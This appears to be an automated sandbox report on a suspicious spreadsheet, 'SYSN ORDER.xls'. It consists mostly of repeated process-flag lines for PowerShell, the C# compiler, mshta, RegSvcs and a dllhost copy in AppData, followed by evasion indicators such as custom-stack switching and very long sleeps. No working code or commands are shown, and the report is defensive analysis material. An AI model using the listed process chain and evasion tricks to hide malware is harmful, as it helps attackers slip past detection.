Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: SYSN ORDER.xls Stream path 'Workbook' entropy: 7.9994310106 (max. 8.0)
Source: B8230000.0.dr Stream path 'Workbook' entropy: 7.99946016923 (max. 8.0)

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Roaming\dllhost.exe API/Special instruction interceptor: Address: 35A229C
Source: C:\Users\user\AppData\Roaming\dllhost.exe API/Special instruction interceptor: Address: 3AF229C
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
